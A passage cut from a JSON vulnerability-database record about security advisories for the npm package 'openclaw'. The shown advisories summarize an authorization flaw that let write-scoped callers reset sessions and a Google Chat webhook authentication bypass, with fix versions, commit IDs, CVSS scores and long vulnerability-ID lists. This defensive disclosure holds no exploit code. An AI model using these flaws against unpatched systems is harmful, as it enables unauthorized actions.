`2026.3.11`\n\n## Technical Details\nScope checks were enforced only on the outer RPC method. The `agent` slash-command path reused admin-only reset logic internally, so a write-scoped caller could reach session-reset mutation without holding `operator.admin`.\n\n## Fix\nOpenClaw no longer routes conversation `/new` and `/reset` through the admin-only `sessions.reset` entry point. Reset logic now lives in a shared service, while `sessions.reset` remains admin-only. The fix shipped in `openclaw@2026.3.11`.\n\n## Workarounds\nUpgrade to `2026.3.11` or later.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jf6w-m8jw-jfxc","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jf6w-m8jw-jfxc"},{"reference_url":"https://github.com/advisories/GHSA-jf6w-m8jw-jfxc","reference_id":"GHSA-jf6w-m8jw-jfxc","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-jf6w-m8jw-jfxc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74883?format=json","purl":"pkg:npm/openclaw@2026.3.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.11"}],"aliases":["GHSA-jf6w-m8jw-jfxc"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-afkf-r949-dkgu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91439?format=json","vulnerability_id":"VCID-aja9-wzp2-kbcj","summary":"OpenClaw: Google Chat app-url webhook auth accepted non-deployment add-on principals\n## Summary\nGoogle Chat app-url webhook verification accepted add-on principals outside the intended deployment binding.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `a47722de7e3c9cbda8d5512747ca7e3bb8f6ee66`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- extensions/googlechat/src/auth.ts now requires expectedAddOnPrincipal matching for add-on principals and rejects unexpected issuers.\n- extensions/googlechat/src/monitor-webhook.ts passes the configured appPrincipal into auth verification for the shipped webhook path.\n\nOpenClaw thanks @ijxpwastaken for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35622","reference_id":"","reference_type":"","scores":[{"value":"0.00075","scoring_system":"epss","scoring_elements":"0.22596","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00075","scoring_system":"epss","scoring_elements":"0.22641","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00075","scoring_system":"epss","scoring_elements":"0.22656","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35622"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:16:25Z/"}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/a47722de7e3c9cbda8d5512747ca7e3bb8f6ee66","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:16:25Z/"}],"url":"https://github.com/openclaw/openclaw/commit/a47722de7e3c9cbda8d5512747ca7e3bb8f6ee66"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-mp66-rf4f-mhh8","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:16:25Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-mp66-rf4f-mhh8"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35622","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35622"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-improper-authentication-verification-in-google-chat-webhook","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:16:25Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-improper-authentication-verification-in-google-chat-webhook"},{"reference_url":"https://github.com/advisories/GHSA-mp66-rf4f-mhh8","reference_id":"GHSA-mp66-rf4f-mhh8","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-mp66-rf4f-mhh8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vuln